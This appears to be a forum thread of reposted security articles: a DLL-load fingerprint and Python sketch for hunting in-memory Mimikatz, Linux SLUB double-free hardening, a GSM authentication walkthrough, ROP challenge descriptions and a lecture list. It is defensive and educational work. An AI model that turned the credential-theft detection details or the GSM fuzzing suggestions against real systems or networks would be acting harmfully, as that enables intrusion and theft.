Therefore, all 5 of those modules being loaded together by other processes handling credentials makes sense. We could use this knowledge to filter out a few processes where one would normally enter credentials to authenticate to a certain service or application. For example, processes such as Chrome, IE, or even Outlook (known for asking for your password 50 times a day) would load those modules. SSO via your browser would also load most of those images.

Final Thoughts

Even though this is just part I of detecting in-memory Mimikatz, we are already coming up with a basic fingerprint that will allow us to reduce the number of false positives when hunting for this tool when it is executed in memory.
Based on the number of tests performed, a basic fingerprint for in-memory Mimikatz from a modules perspective could be:

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll

If you can afford (enough space) to log one more image being loaded in your environment, I think it would be a good idea to monitor for the following module. I only saw it being loaded by PowerShell after launching several other applications and logging the modules being loaded.

C:\Windows\Microsoft.NET\Framework64\[Versions available]\WMINet_Utils.dll

Hunting technique recommended: Grouping [Source]

"Grouping consists of taking a set of multiple unique artifacts and identifying when multiple of them appear together based on certain criteria. The major difference between grouping and clustering is that in grouping your input is an explicit set of items that are each already of interest. Discovered groups within these items of interest may potentially represent a tool or a TTP that an attacker might be using. An important aspect of using this technique consists of determining the specific criteria used to group the items, such as events having occurred during a specific time window. This technique works best when you are hunting for multiple, related instances of unique artifacts, such as the case of isolating specific reconnaissance commands that were executed within a specific timeframe."

Therefore, the idea is to group the 5 images/modules mentioned above being loaded within a 1-5 second time bucket, while possibly filtering out known processes performing that type of behavior. Only a few processes, as far as I can tell, load all 5 modules (not just one, two, three, or four) during authentication operations. In addition, NONE of the other processes launched during testing loaded the 5 modules together with the WMINet_Utils.dll one.
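The grouping idea above can be sketched in a few lines of Python. This is a toy illustration, not a production rule: the event shape ('process', 'image', 'ts' fields) is hypothetical, standing in for parsed Sysmon Event ID 7 records from your log pipeline.

```python
# Toy "grouping" hunt: flag any process that loads all fingerprint modules
# within a short time window. Event fields are hypothetical stand-ins for
# parsed Sysmon Event ID 7 (Image Load) records.
from collections import defaultdict

FINGERPRINT = {"winscard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll"}
WINDOW = 5  # seconds: the "bucket time" discussed above

def hunt(events):
    """Return processes that loaded every fingerprint module within WINDOW seconds."""
    hits = []
    per_proc = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        name = e["image"].rsplit("\\", 1)[-1].lower()   # keep only the file name
        if name in FINGERPRINT:
            per_proc[e["process"]].append((e["ts"], name))
    for proc, loads in per_proc.items():
        # slide a window starting at each fingerprint load for this process
        for i, (start, _) in enumerate(loads):
            seen = {n for t, n in loads[i:] if t - start <= WINDOW}
            if seen == FINGERPRINT:
                hits.append(proc)
                break
    return hits
```

In practice the same logic could be expressed as an aggregation in your SIEM; the point is that the rule fires only when all five modules appear together in the bucket, not on any single module.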
Therefore, I see the value in grouping them together and seeing what processes are loading all of those in a short period of time (seconds). Once again, this is just part I, and in future posts I will combine this approach with other chains of events in order to reduce the number of false positives while hunting for in-memory Mimikatz. Let me know how it works out for you when logging for those specific modules in your organization. I would highly recommend taking this approach on a gold image first and then logging one module at a time to test which might cause several false positives. I would love to hear your results! Feedback is greatly appreciated! Thank you.

Update (03/21/2017)

Mimikatz new version released: 2.1.1 20170320. Extra DLL loaded: "Winsta.dll". A really noisy one, so it does not change our basic fingerprint.

References:
Security Management Components
Authentication Security Components
Exfiltration/Get-VaultCredential.ps1
PowerSploit - Invoke-Mimikatz
Empire Project - Invoke-Mimikatz
Process Hacker

SANS Wardog at 8:21 PM

Sursa: https://cyberwardog.blogspot.ro/2017/03/chronicles-of-threat-hunter-hunting-for.html?m=1
19. Protecting the irreplaceable | www.f-secure.com
Kimmo Kasslin, 26th Feb 2014
T-110.6220 Special Course in Information Security
Slides: http://www.cse.tkk.fi/fi/opinnot/T-110.6220/2014_Reverse_Engineering_Malware_AND_Mobile_Platform_Security_AND_Software_Security/luennot-files/T1106220.pdf
20. Given the way I write code, not even I know anymore what, when, why, and how I wrote it, let alone running some heuristic analyses on it...
21. August 30, 2017

Blocking double-free in the Linux kernel

On the 7th of August, the Positive Technologies expert Alexander Popov gave a talk at SHA2017. SHA stands for Still Hacking Anyway; it is a big outdoor hacker camp in the Netherlands. The slides and recording of Alexander's talk are available. This short article describes some new aspects of Alexander's talk which haven't been covered in our blog.

The general method of exploiting a double-free error is based on turning it into a use-after-free bug. That is usually achieved by allocating a memory region of the same size between the double free() calls (see the diagram below). That technique is called heap spraying. However, in the case of CVE-2017-2636, which Alexander exploited, there are 13 buffers freed straight away. Moreover, the double freeing happens at the beginning. So the usual heap spraying described above doesn't work for that vulnerability. Nevertheless, Alexander managed to turn that state of the system into a use-after-free error.

He abused the naive behaviour of SLUB, which is currently the main Linux kernel allocator. It turned out that SLUB allows consecutive double freeing of the same memory region. In contrast, the GNU C library allocator has a "fasttop" check against it, which introduces a relatively small performance penalty. The idea is simple: report an error on freeing a memory region if its address is the same as the last one on the allocator's "freelist". A similar check in SLUB would block some double-free exploits in the Linux kernel (including Alexander's PoC exploit for CVE-2017-2636). So Alexander modified the set_freepointer() function in mm/slub.c and sent the patch to the Linux Kernel Mailing List (LKML). It provoked a lively discussion. The SLUB maintainers didn't like that this check:

introduces some performance penalty for the default SLUB functionality;
duplicates some part of the already existing slub_debug feature;
causes a kernel oops in case of a double-free error.
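The "fasttop"-style idea described above is easy to illustrate with a toy allocator model. The following Python sketch is an illustration only, not kernel code: it mimics the comparison that glibc's fasttop check and the hardened SLUB freelist check perform, namely refusing to free a chunk whose address matches the current freelist head.

```python
# Toy freelist model illustrating the consecutive double-free check
# described in the article (glibc "fasttop" / hardened SLUB idea).
class Freelist:
    def __init__(self):
        self.head = None    # address of the most recently freed chunk
        self.chunks = []    # LIFO stack of free chunk addresses

    def free(self, addr):
        # The whole check: a free whose address equals the freelist head
        # is a consecutive double free, so report an error instead.
        if addr == self.head:
            raise RuntimeError("double free detected (freelist head match)")
        self.chunks.append(addr)
        self.head = addr

    def alloc(self):
        addr = self.chunks.pop()
        self.head = self.chunks[-1] if self.chunks else None
        return addr
```

Note that, exactly like the real checks, this only catches a consecutive double free of the same region; freeing the region again after an unrelated free slips through, which is why it is a cheap hardening measure rather than a complete defense.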
Alexander replied with his arguments:

slub_debug is not enabled in Linux distributions by default (due to the noticeable performance impact);
when the allocator detects a double free, some severe kernel error has already occurred on behalf of some process, so it might not be worth trusting that process (which might be an exploit).

Finally, Kees Cook helped to negotiate adding Alexander's check behind the CONFIG_SLAB_FREELIST_HARDENED kernel option. So currently the second version of Alexander's patch is accepted and applied to the linux-next branch. It should get to the Linux kernel mainline in the near future. We hope that in the future some popular Linux distribution will provide the kernel with the security hardening options (including CONFIG_SLAB_FREELIST_HARDENED) enabled by default.

Author: Positive Research at 7:01 AM

Sursa: http://blog.ptsecurity.com/2017/08/linux-block-double-free.html?
22. DISSECTING GSM ENCRYPTION AND LOCATION UPDATE PROCESS
31/08/2017, in Blog, by Rashid Feroze

Have you ever wondered what happens when you turn on your mobile phone? How does it communicate with the network in a secure manner? Almost all of us have read about TCP/IP, and many of us are experts in it, but when it comes to telecom, very few know how it actually works from the inside. What is the message structure in GSM? What kind of encryption does it use? So, today we will talk in detail about the encryption standards of GSM and how the mobile phone updates its location with the mobile network.

WHAT HAPPENS WHEN YOU TURN ON YOUR CELL PHONE?

When you turn on your cell phone, it first initiates its radio resource and mobility management processes. The phone receives a list of frequencies supported on the neighbouring cells, either from the SIM or from the network. It camps on a cell depending upon the power level and the mobile provider. After that, it performs a location update process with the network, where the authentication happens. After a successful location update, the mobile phone gets its TMSI and is ready to perform other operations.

Now, let's verify the above statements by having a look at the mobile application debug logs. The screenshots below are from the osmocom mobile application, which simulates a mobile phone working on a PC.

Mobile network information sent by the SIM
Camping on a cell
Location update requested, which includes its LAI and TMSI
Location updating accepted and the used encryption standard visible

OBJECTIVE

We will capture GSM data in Wireshark through osmocom-bb and analyse how the entire process of GSM authentication and encryption happens. We will also see how the location update process happens. We have already talked in detail about osmocom-bb and the call setup process in our last blog, so we will be skipping that part in this blogpost.

GSM ENCRYPTION STANDARDS

A5/0 – No encryption used. Listed just for the sake of completeness.
A5/1 – A5/1 is a stream cipher used to provide over-the-air communication privacy in the GSM cellular telephone standard. It is one of seven algorithms which were specified for GSM use. It was initially kept secret, but became public knowledge through leaks and reverse engineering. A number of serious weaknesses in the cipher have been identified.

A5/2 – A5/2 is a stream cipher used to provide voice privacy in the GSM cellular telephone protocol. It was used for export instead of the relatively stronger (but still weak) A5/1. It is one of seven A5 ciphering algorithms which have been defined for GSM use.

A5/3 (KASUMI) – KASUMI is a block cipher used in the UMTS, GSM, and GPRS mobile communications systems. In UMTS, KASUMI is used in the confidentiality and integrity algorithms with the names UEA1 and UIA1, respectively. In GSM, KASUMI is used in the A5/3 key stream generator, and in GPRS in the GEA3 key stream generator.

There are some others as well, but the ones mentioned above are used in the majority of networks.

HOW GSM AUTHENTICATION AND ENCRYPTION HAPPENS

Every GSM mobile phone has a Subscriber Identity Module (SIM). The SIM provides the mobile phone with a unique identity through the use of the International Mobile Subscriber Identity (IMSI). The SIM is like a key, without which the mobile phone can't function. It is capable of storing personal phone numbers and short messages. It also stores security-related information such as the A3 authentication algorithm, the A8 ciphering key generating algorithm, the authentication key (Ki) and the IMSI. The mobile station stores the A5 ciphering algorithm.

AUTHENTICATION

The authentication procedure checks the validity of the subscriber's SIM card and then decides whether the mobile station is allowed on a particular network. The network authenticates the subscriber through the use of a challenge-response method. First, a 128-bit random number (RAND) is transmitted to the mobile station over the air interface.
The RAND is passed to the SIM card, where it is sent through the A3 authentication algorithm together with the Ki. The output of the A3 algorithm, the signed response (SRES), is transmitted via the air interface from the mobile station back to the network. On the network, the AuC compares its value of SRES with the value of SRES it has received from the mobile station. If the two values of SRES match, authentication is successful and the subscriber joins the network. The AuC actually doesn't store a copy of SRES but queries the HLR or the VLR for it, as needed.

Generation of SRES

ANONYMITY

When a new GSM subscriber turns on his phone for the first time, its IMSI is transmitted to the AuC on the network. After that, a Temporary Mobile Subscriber Identity (TMSI) is assigned to the subscriber. The IMSI is rarely transmitted after this point unless it is absolutely necessary. This prevents a potential eavesdropper from identifying a GSM user by their IMSI. The user continues to use the same TMSI, depending on how often location updates occur. Every time a location update occurs, the network assigns a new TMSI to the mobile phone. The TMSI is stored along with the IMSI in the network. The mobile station uses the TMSI to report to the network or during call initiation. Similarly, the network uses the TMSI to communicate with the mobile station. The Visitor Location Register (VLR) performs the assignment, the administration and the update of the TMSI. When it is switched off, the mobile station stores the TMSI on the SIM card to make sure it is available when it is switched on again.

ENCRYPTION AND DECRYPTION OF DATA

GSM makes use of a ciphering key to protect both user data and signaling on the vulnerable air interface. Once the user is authenticated, the RAND (delivered from the network) together with the Ki (from the SIM) is sent through the A8 ciphering key generating algorithm to produce a ciphering key (Kc). The A8 algorithm is stored on the SIM card.
The Kc created by the A8 algorithm is then used with the A5 ciphering algorithm to encipher or decipher the data. The A5 algorithm is implemented in the hardware of the mobile phone, as it has to encrypt and decrypt data on the fly.

Generation of encryption key (Kc)
Data encryption/decryption using Kc

GSM AUTHORIZATION/ENCRYPTION STEPS

GSM authorization/encryption process

1. When you turn on your mobile for the first time, the MS sends its IMSI to the network.

2. When an MS requests access to the network, the MSC/VLR will normally require the MS to authenticate. The MSC will forward the IMSI to the HLR and request authentication triplets.

3. When the HLR receives the IMSI and the authentication request, it first checks its database to make sure the IMSI is valid and belongs to the network. Once it has accomplished this, it will forward the IMSI and authentication request to the Authentication Center (AuC). The AuC will use the IMSI to look up the Ki associated with that IMSI. The Ki is the individual subscriber authentication key. It is a 128-bit number that is paired with an IMSI when the SIM card is created. The Ki is only stored on the SIM card and at the AuC. The AuC will also generate a 128-bit random number called the RAND. The RAND and the Ki are input into the A3 encryption algorithm. The output is the 32-bit Signed Response (SRES). The SRES is essentially the "challenge" sent to the MS when authentication is requested. The RAND, SRES, and Kc are collectively known as the triplets. The HLR will send the triplets to the MSC/VLR.

4. The VLR/MSC will then forward only the RAND value to the MS.

5. The MS calculates the SRES using the Ki stored in its SIM and the RAND value sent by the network. The MS sends this SRES value back to the MSC/VLR.

6. The MSC/VLR matches the SRES value with the one that the HLR sent to it. If it matches, it successfully authorizes the MS.

7.
Once authenticated, both the mobile and the network generate Kc using the Ki and the RAND value with the help of the A8 algorithm.

8. The data is then encrypted/decrypted using this uniquely generated key (Kc) with the A5 ciphering algorithm.

LOCATION UPDATE STEPS

Location update process

1. When you turn on your cellphone, it first tells the network that it is here and wants to register to the network. After that, it sends a location update request which includes its previous LAI and its TMSI.

2. After receiving the TMSI, if the TMSI does not exist in its database, the VLR asks for the IMSI, and after receiving the IMSI the VLR asks the HLR for the subscriber info based on the IMSI. Here, if the VLR does not find the TMSI in its database, it will find the address of the old VLR which the MS was connected to using the LAI. A request is sent to the old VLR, requesting the IMSI of the subscriber. The old VLR provides the IMSI corresponding to the TMSI sent by the MS. Note that the IMSI could also have been obtained from the mobile, but that is not the preferred option, as the Location Updating Request is sent in the clear, so it could be used to determine the association between the IMSI and the TMSI.

3. The HLR in turn asks the AuC for the triplets for this IMSI. The HLR forwards the triplets (RAND, Kc, SRES) to the VLR/MSC.

4. The MSC will take the details from the VLR and pass only the RAND value to the MS. The MS will compute the SRES again and will send it back to the MSC.

5. The MSC will take the SRES stored in the VLR and compare it to the SRES sent by the MS. If both match, then the location update is successful.

6. After it is successful, an HLR update happens, the HLR updates the subscriber's current location, and a TMSI is allocated to this MS. Since the TMSI assignment is sent after ciphering is enabled, the relationship between the TMSI and the subscriber cannot be obtained by unauthorized users. The GSM mobile replies back indicating that the new TMSI allocation has been completed.
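To make the challenge-response steps above concrete, here is a Python sketch of the message flow. The real A3/A8 algorithms are operator-specific (often COMP128 variants) and are not published in the standard, so HMAC-SHA1 is used here purely as a hypothetical stand-in to show which side knows what.

```python
# Sketch of the GSM challenge-response flow. HMAC-SHA1 is a stand-in for
# the operator-specific A3/A8 algorithms; only the message flow is real.
import hmac, hashlib, os

def a3_sres(ki: bytes, rand: bytes) -> bytes:
    """Stand-in A3: derive the 32-bit signed response from Ki and RAND."""
    return hmac.new(ki, b"A3" + rand, hashlib.sha1).digest()[:4]

def a8_kc(ki: bytes, rand: bytes) -> bytes:
    """Stand-in A8: derive the 64-bit ciphering key Kc from Ki and RAND."""
    return hmac.new(ki, b"A8" + rand, hashlib.sha1).digest()[:8]

# Network side (AuC): Ki is shared only by the SIM and the AuC.
ki = os.urandom(16)                 # 128-bit Ki
rand = os.urandom(16)               # 128-bit challenge sent over the air
triplet = (rand, a3_sres(ki, rand), a8_kc(ki, rand))   # (RAND, SRES, Kc)

# Mobile side (SIM): receives only RAND, computes SRES with its own Ki.
sres_ms = a3_sres(ki, rand)
assert sres_ms == triplet[1]        # MSC/VLR compares the SRES values

# After authentication, both sides derive the same Kc for the A5 cipher.
kc_ms = a8_kc(ki, rand)
assert kc_ms == triplet[2]
```

Note how Ki itself never crosses the air interface: only RAND goes out and only SRES comes back, which is the whole point of the challenge-response design.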
Now, we will analyze the GSM packets in Wireshark and check what is really happening over the air.

1. Immediate assignment – A radio channel is requested by the MS and a radio channel is allocated to the MS by the mobile provider. We can also see what kind of control channel (SDCCH/SACCH) is being used here in the channel description.

2. Location update requested – The MS sends a location update request which includes its previous LAI and its TMSI.

3. Authentication request – The VLR/MSC forwards the RAND which it got from the HLR to the MS. We can clearly see the random value that the network sent to the mobile.

4. SRES generation in the MS – The MS generates the SRES value using the A3 authentication algorithm with the help of the Ki stored in the SIM.

5. Authentication response – The MS sends the SRES value which it calculated. We can clearly see the SRES value here.

6. Ciphering mode command – The BSC sends the CIPHERING MODE COMMAND to the mobile. Ciphering has already been enabled, so this message is transmitted with ciphering. The mobile replies to it with mode CIPHERED. We can also see the Ciphering mode complete packet below. We can see that it is using the A5/1 cipher.

7. Location updating accepted – After the successful authentication, the location update happens, where the MS gives its location information to the network.

8. TMSI reallocation complete – The mobile provider allocates a TMSI to the MS, and this message is encrypted so that no one can sniff the identity of the user (TMSI).

9. Radio channel release – The allocated radio channel is released.

WHAT NOW?

It was noticed that sometimes operators don't use any encryption at all so that they can handle more load on the network, since the encryption/decryption process increases the overhead. Sometimes, there are also issues in the configuration of the authentication process which can be used by an attacker to bypass authentication completely.
GSM security is a huge, largely unexplored field where a lot still has to be explored and done. Now that you know how to analyze GSM data down to the lowest level, you can read, analyze and modify the code of osmocom in order to send arbitrary frames to the network, or from the network to the phone. You can start fuzzing GSM-level protocols to find out whether you can actually crash any network device. There is a lot to do, but it requires a very deep understanding of GSM networks and of the legal aspects around this. I would suggest you create your own GSM network and run your tests on that if you want to go ahead with this. We will be posting more blog posts on GSM. Stay tuned! REFERENCES https://www.sans.org/reading-room/whitepapers/telephone/gsm-standard-an-overview-security-317 http://mowais.seecs.nust.edu.pk/encryption.shtml Sursa: http://payatu.com/dissecting-gsm-encryption-location-update-process/
  23. ROP Emporium Learn return-oriented programming through a series of challenges designed to teach ROP techniques in isolation, with minimal reverse-engineering and bug-hunting. ret2win ret2win means 'return here to win' and it's recommended you start with this challenge. split Combine elements from the ret2win challenge that have been split apart to beat this challenge. Learn how to use another tool whilst crafting a short ROP chain. callme Chain calls to multiple imported methods with specific arguments and see how the differences between 64- and 32-bit calling conventions affect your ROP chain. write4 Find and manipulate gadgets to construct an arbitrary write primitive and use it to learn where and how to get your data into process memory. badchars Learn to deal with badchars: characters that will not make it into process memory intact or that cause other issues such as premature chain termination. fluff Sort the useful gadgets from the fluff to construct another write primitive in this challenge. You'll have to get creative though; the gadgets aren't straightforward. pivot Stack space is at a premium in this challenge and you'll have to pivot the stack onto a second ROP chain elsewhere in memory to ensure your success. Sursa: https://ropemporium.com/
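The ret2win-style chains these challenges build all share the same basic layout: padding up to the saved return address, then a sequence of gadget and data qwords. A minimal sketch in Python follows; every address and the padding offset below are hypothetical placeholders, which in a real exploit you would recover with a disassembler or a gadget finder.

```python
import struct

# Sketch of a minimal 64-bit ret2win-style ROP chain layout.
# All addresses/offsets below are HYPOTHETICAL placeholders.
OFFSET_TO_RET = 40          # bytes of buffer + saved rbp before the return address
POP_RDI_RET   = 0x400703    # hypothetical 'pop rdi ; ret' gadget
RET_GADGET    = 0x400704    # lone 'ret' to keep the stack 16-byte aligned
TARGET_FUNC   = 0x400811    # hypothetical address of the 'win' function
ARG_VALUE     = 0xDEADBEEF  # value the target expects in its first argument

def p64(value: int) -> bytes:
    """Pack a value as a little-endian 64-bit qword."""
    return struct.pack("<Q", value)

payload  = b"A" * OFFSET_TO_RET   # filler up to the saved return address
payload += p64(POP_RDI_RET)       # gadget: load the first-argument register
payload += p64(ARG_VALUE)         # value popped into rdi
payload += p64(RET_GADGET)        # realign the stack before the call
payload += p64(TARGET_FUNC)       # finally 'return' into the target function

print(payload.hex())
```

Once the overflowed function executes its `ret`, each qword on the stack is consumed in order: the gadget pops the argument into rdi, the extra `ret` fixes alignment for the System V ABI, and execution lands in the target function.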
  24. CEH, CISSP?
  25. Deep Learning (DLSS) and Reinforcement Learning (RLSS) Summer School, Montreal 2017 Deep neural networks that learn to represent data in multiple layers of increasing abstraction have dramatically improved the state-of-the-art for speech recognition, object recognition, object detection, predicting the activity of drug molecules, and many other tasks. Deep learning discovers intricate structure in large datasets by building distributed representations, either via supervised, unsupervised or reinforcement learning. The Deep Learning Summer School (DLSS) is aimed at graduate students and industrial engineers and researchers who already have some basic knowledge of machine learning (and possibly but not necessarily of deep learning) and wish to learn more about this rapidly growing field of research. In collaboration with DLSS we will hold the first edition of the Montreal Reinforcement Learning Summer School (RLSS). RLSS will cover the basics of reinforcement learning and show its most recent research trends and discoveries, as well as present an opportunity to interact with graduate students and senior researchers in the field. The school is intended for graduate students in Machine Learning and related fields. Participants should have advanced prior training in computer science and mathematics, and preference will be given to students from research labs affiliated with the CIFAR program on Learning in Machines and Brains. 
Deep Learning Summer School lectures: Machine Learning (Doina Precup); Neural Networks (Hugo Larochelle); Recurrent Neural Networks (RNNs) (Yoshua Bengio); Probabilistic numerics for deep learning (Michael Osborne); Generative Models I (Ian Goodfellow); Theano (Pascal Lamblin); AI Impact on Jobs (Michael Osborne); Introduction to CNNs (Richard Zemel); Structured Models/Advanced Vision (Raquel Urtasun); Torch/PyTorch (Soumith Chintala); Generative Models II (Aaron Courville); Natural Language Understanding (Phil Blunsom); Natural Language Processing (Phil Blunsom); Bayesian Hyper Networks (David Scott Krueger); Gibs Net (Alex Lamb); Pixel GAN autoencoder (Alireza Makhzani); CRNN's (Rémi Leblond, Jean-Baptiste Alayrac); Deep learning in the brain (Blake Aaron Richards); Theoretical Neuroscience and Deep Learning Theory (Surya Ganguli); Marrying Graphical Models & Deep Learning (Max Welling); Learning to Learn (Nando de Freitas); Automatic Differentiation (Matthew James Johnson); Combining Graphical Models and Deep Learning (Matthew James Johnson); Domain Randomization for Cuboid Pose Estimation (Jonathan Tremblay); tbd (Rogers F. Silva); What Would Shannon Do? Bayesian Compression for DL (Karen Ullrich); On the Expressive Efficiency of Overlapping Architectures of Deep Learning (Or Sharir).
Reinforcement Learning Summer School lectures: Reinforcement Learning (Joelle Pineau); Policy Search for RL (Pieter Abbeel); TD Learning (Richard S. Sutton); Deep Reinforcement Learning (Hado van Hasselt); Deep Control (Nando de Freitas); Theory of RL (Csaba Szepesvári); Reinforcement Learning (Satinder Singh); Safe RL (Philip S. Thomas); Applications of bandits and recommendation systems (Nicolas Le Roux); Cooperative Visual Dialogue with Deep RL (Devi Parikh, Dhruv Batra). Sursa: http://videolectures.net/deeplearning2017_montreal/